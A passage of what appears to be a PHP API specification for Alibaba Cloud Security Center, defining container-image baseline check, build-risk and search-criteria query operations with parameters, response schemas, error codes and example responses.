'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"BaselineDetail\\": {\\n \\"Advice\\": \\"删除泄漏的AK信息。\\",\\n \\"ResultId\\": \\"async__c6f3b0b54613383b40bdce593ffe****\\",\\n \\"Description\\": \\"Access Key泄露,会导致Access Key被冒用的风险。\\",\\n \\"BaselineItemAlias\\": \\"Access Key泄露\\",\\n \\"BaselineNameAlias\\": \\"Access Key泄露\\",\\n \\"BaselineClassAlias\\": \\"ak_leak\\",\\n \\"BaselineItemKey\\": \\"ak_leak\\",\\n \\"Prompt\\": \\"/usr/aksk.txt:yourAccessKeyID\\",\\n \\"Level\\": \\"high\\"\\n }\\n}","type":"json"}]', ], 'DescribeImageBaselineItemList' => [ 'summary' => 'Queries the list of baseline check results by image.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92101', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => true, 'example' => '0b5c7193300da2070220038718ad****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The fix status of the baseline risk. Valid values:'."\n" .'- **0**: unfixed'."\n" .'- **1**: fixed'."\n" .'- **2**: pending verification'."\n" .'- **3**: fix failed.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'BaselineClassKey', 'in' => 'query', 'schema' => ['description' => 'The key of the baseline category.', 'type' => 'string', 'required' => false, 'example' => 'ak_leak', 'title' => ''], ], [ 'name' => 'BaselineNameKey', 'in' => 'query', 'schema' => ['description' => 'The key of the baseline name.', 'type' => 'string', 'required' => false, 'example' => 'Access Key泄露', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The scan scope collection.', 'type' => 'array', 'items' => ['description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: image'."\n" .'- **container**: container.', 'type' => 'string', 'required' => false, 'example' => 'image,container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of image UUIDs.', 'type' => 'array', 'items' => ['description' => 'The list of image UUIDs.', 'type' => 'string', 'required' => false, 'example' => '5b6d4072118f487094199cedf90c****,f6310b7976144639867beea2f346****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query results.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '253', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BaselineItemInfos' => [ 'description' => 'The list of image baseline data.', 'type' => 'array', 'items' => [ 'description' => 'The list of image baseline data.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The fix status of the baseline risk. Valid values:'."\n" .'- **0**: unfixed'."\n" .'- **1**: fixed'."\n" .'- **2**: pending verification'."\n" .'- **3**: fix failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'WhiteList' => ['description' => 'The whitelist status of the baseline check item. Valid values:'."\n" .'- **0**: not whitelisted'."\n" .'- **1**: whitelisted.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'BaselineNameKey' => ['description' => 'The key of the baseline name.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'BaselineItemAlias' => ['description' => 'The alias of the baseline sub-item.', 'type' => 'string', 'example' => 'Access Key泄漏', 'title' => ''], 'BaselineClassKey' => ['description' => 'The key of the baseline category.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'BaselineClassAlias' => ['description' => 'The alias of the baseline category.', 'type' => 'string', 'example' => 'Access Key泄漏', 'title' => ''], 'BaselineNameAlias' => ['description' => 'The alias of the baseline name.', 'type' => 'string', 'example' => 'Access Key泄漏', 'title' => ''], 'BaselineItemKey' => ['description' => 'The key of the baseline sub-item.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'MissingImageUuid', 'errorMessage' => 'The image ID is required.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query baseline check items by image', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineItemList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBaselineItemList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 253,\\n \\"Count\\": 20\\n },\\n \\"BaselineItemInfos\\": [\\n {\\n \\"Status\\": 0,\\n \\"WhiteList\\": 0,\\n \\"BaselineNameKey\\": \\"ak_leak\\",\\n \\"BaselineItemAlias\\": \\"Access Key泄漏\\",\\n \\"BaselineClassKey\\": \\"ak_leak\\",\\n \\"BaselineClassAlias\\": \\"Access Key泄漏\\",\\n \\"BaselineNameAlias\\": \\"Access Key泄漏\\",\\n \\"BaselineItemKey\\": \\"ak_leak\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageBaselineStrategy' => [ 'summary' => 'Queries the image baseline policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8037', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. If this parameter is left empty, the image baseline policy is queried by default. Valid values:'."\n" .'- **default**: image'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '9F85AC10-A1FE-54D7-935A-F28D5256****', 'title' => ''], 'Strategy' => [ 'description' => 'The baseline check policy information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the baseline check policy. Valid values:'."\n" ."\n" .'- **default**: default policy'."\n" .'- **full**: full baseline item policy'."\n" .'- **normal**: common baseline item policy.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'StrategyName' => ['description' => 'The Policy Name.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'StrategyId' => ['description' => 'The ID of the baseline check policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '8257', 'title' => ''], 'SelectedItemCount' => ['description' => 'The number of selected baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalItemCount' => ['description' => 'The total number of baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'BaselineItemList' => [ 'description' => 'The list of baseline items.', 'type' => 'array', 'items' => [ 'description' => 'The list of baseline items.', 'type' => 'object', 'properties' => [ 'NameKey' => ['description' => 'The name key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'ItemKey' => ['description' => 'The key of the baseline subitem.', 'type' => 'string', 'example' => 'duplicate_pwd_hash', 'title' => ''], 'ClassKey' => ['description' => 'The classification key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'BaselineItem' => ['description' => 'The agentless baseline check policy.', 'type' => 'string', 'example' => 'hc_win2008_cis_rules', 'title' => ''], 'ImageVulClean' => ['description' => 'The retention period of baseline risks. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'example' => '90', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image baseline policy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBaselineStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9F85AC10-A1FE-54D7-935A-F28D5256****\\",\\n \\"Strategy\\": {\\n \\"Type\\": \\"default\\",\\n \\"StrategyName\\": \\"default\\",\\n \\"StrategyId\\": 8257,\\n \\"SelectedItemCount\\": 10,\\n \\"TotalItemCount\\": 100,\\n \\"BaselineItemList\\": [\\n {\\n \\"NameKey\\": \\"identification\\",\\n \\"ItemKey\\": \\"duplicate_pwd_hash\\",\\n \\"ClassKey\\": \\"identification\\"\\n }\\n ],\\n \\"BaselineItem\\": \\"hc_win2008_cis_rules\\",\\n \\"ImageVulClean\\": 90\\n }\\n}","type":"json"}]', ], 'DescribeImageBuildRiskByKey' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RiskKey', 'in' => 'query', 'schema' => ['description' => 'The key of the build risk rule.'."\n" .'>You can call the [DescribeImageBuildRiskList](~~DescribeImageBuildRiskList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'no_user', 'title' => ''], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => false, 'example' => 'a910053dd4710173ecc9e9d8931f****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the alert event to query. Valid values:'."\n" .'- **0**: unhandled.'."\n" .'- **1**: ignored.'."\n" .'- **2**: false positive.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult>', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of build risks.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'LayerDigest' => ['description' => 'The digest of the image layer.', 'type' => 'string', 'example' => '6ec898e6274f942e0e4a053eff1c3119026a6704e56cff206b2cec71f636****', 'title' => ''], 'LayerCmd' => ['description' => 'The build command of the image layer.', 'type' => 'string', 'example' => 'user root', 'title' => ''], 'Advice' => ['description' => 'The remediation suggestion.', 'type' => 'string', 'example' => 'do not use root user', 'title' => ''], 'Promt' => ['description' => 'The risk prompt.', 'type' => 'string', 'example' => 'the root user has excessive permissions', 'title' => ''], 'Description' => ['description' => 'The description of the build risk remediation suggestion.', 'type' => 'string', 'example' => 'the root user has excessive permissions', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" .'- **high**: high.'."\n" .'- **medium**: medium.'."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'RiskKey' => ['description' => 'The key of the build risk rule.', 'type' => 'string', 'example' => 'no_user', 'title' => ''], 'RiskKeyName' => ['description' => 'The name of the build risk rule.', 'type' => 'string', 'example' => 'no_user', 'title' => ''], 'RiskClass' => ['description' => 'The category key of the build risk rule.', 'type' => 'string', 'example' => 'other', 'title' => ''], 'RiskClassName' => ['description' => 'The category name of the build risk rule.', 'type' => 'string', 'example' => 'other', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging query parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '109', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code of the API call.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query image build risks by page', 'summary' => 'Queries the build risks of images by paging.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBuildRiskByKey'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBuildRiskByKey', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"List\\": [\\n {\\n \\"LayerDigest\\": \\"6ec898e6274f942e0e4a053eff1c3119026a6704e56cff206b2cec71f636****\\",\\n \\"LayerCmd\\": \\"user root\\",\\n \\"Advice\\": \\"do not use root user\\",\\n \\"Promt\\": \\"the root user has excessive permissions\\",\\n \\"Description\\": \\"the root user has excessive permissions\\",\\n \\"RiskLevel\\": \\"medium\\",\\n \\"RiskKey\\": \\"no_user\\",\\n \\"RiskKeyName\\": \\"no_user\\",\\n \\"RiskClass\\": \\"other\\",\\n \\"RiskClassName\\": \\"other\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 109\\n }\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\"\\n}","type":"json"}]', ], 'DescribeImageBuildRiskList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '200040', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The **rule name** or **category name** of the build risk. You can call the [DescribeImageBuildRiskList](~~~~) operation to obtain the value. Valid values:'."\n" .'- If **CriteriaType** is set to **RiskKeyName**, the value is the **rule name** of the build risk.'."\n" .'- If **CriteriaType** is set to **RiskClassName**, the value is the **category name** of the build risk.', 'type' => 'string', 'required' => false, 'example' => 'no_user', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The query type of the build risk. Valid values:'."\n" .'- **RiskKeyName**: build risk rule name.'."\n" .'- **RiskClassName**: build risk category name.', 'type' => 'string', 'required' => false, 'example' => 'RiskKeyName', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" ."\n" .'- **medium**: Medium.'."\n" ."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'medium', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when paging is used. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging is used. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult>', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The summary list of build risks.', 'type' => 'array', 'items' => [ 'description' => 'The list of data packets that match the filter conditions.', 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" ."\n" .'- **medium**: Medium.'."\n" ."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'RiskClass' => ['description' => 'The key of the build risk rule category.', 'type' => 'string', 'example' => 'other', 'title' => ''], 'RiskKey' => ['description' => 'The key of the build risk rule. You can call the [DescribeImageBuildRiskList](~~~~) operation to obtain the value of **RiskKey**.', 'type' => 'string', 'example' => 'no_user', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723710827000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723710827999', 'title' => ''], 'Count' => ['description' => 'The number of affected images.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RiskClassName' => ['description' => 'The category name of the build risk rule.', 'type' => 'string', 'example' => 'other', 'title' => ''], 'RiskKeyName' => ['description' => 'The name of the build risk rule.', 'type' => 'string', 'example' => 'no_user', 'title' => ''], 'UnprocessedNum' => ['description' => 'The number of unprocessed images.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '109', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query image build risk summary by page', 'summary' => 'Queries the summary of image build risks by using paging.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBuildRiskList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBuildRiskList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"List\\": [\\n {\\n \\"RiskLevel\\": \\"medium\\",\\n \\"RiskClass\\": \\"other\\",\\n \\"RiskKey\\": \\"no_user\\",\\n \\"FirstScanTime\\": 1723710827000,\\n \\"LastScanTime\\": 1723710827999,\\n \\"Count\\": 2,\\n \\"RiskClassName\\": \\"other\\",\\n \\"RiskKeyName\\": \\"no_user\\",\\n \\"UnprocessedNum\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 109\\n }\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\"\\n}","type":"json"}]', ], 'DescribeImageCriteria' => [ 'summary' => 'Retrieves image search criteria.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The fuzzy match value that you enter when querying images.'."\n" ."\n" .'> This parameter supports fuzzy matching by image ID, image tag, image instance ID, image repository name, image repository ID, image repository namespace, image region, image digest, or image repository type.', 'type' => 'string', 'required' => false, 'example' => '525', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'CriteriaList' => [ 'description' => 'The list of image query criteria.', 'type' => 'array', 'items' => [ 'description' => 'The image query criterion.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the query criterion. Valid values:'."\n" ."\n" .'- **input**: requires manual input of the query field.'."\n" .'- **select**: requires selecting a subtype from a drop-down list.', 'type' => 'string', 'example' => 'input', 'title' => ''], 'Name' => ['description' => 'The name of the query criterion.'."\n" ."\n" .'- **tag**: image tag.'."\n" .'- **digest**: image digest.'."\n" .'- **vulStatus**: vulnerability status.'."\n" .'- **alarmStatus**: security alert status.'."\n" .'- **riskStatus**: risk status.'."\n" .'- **registryType**: image repository type.', 'type' => 'string', 'example' => 'vulStatus', 'title' => ''], 'Values' => ['description' => 'The available option values when **Type** (the type of the query criterion) is **select**.'."\n" .'> When **Type** (the type of the query criterion) is **input**, this parameter returns an empty value.', 'type' => 'string', 'example' => 'NO,YES', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve image search criteria', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"input\\",\\n \\"Name\\": \\"vulStatus\\",\\n \\"Values\\": \\"NO,YES\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageEventOperationCondition' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'EventType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alerting type.'."\n" .'- **sensitiveFile**: sensitive file.', 'type' => 'string', 'required' => false, 'example' => 'sensitiveFile'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'EventType' => 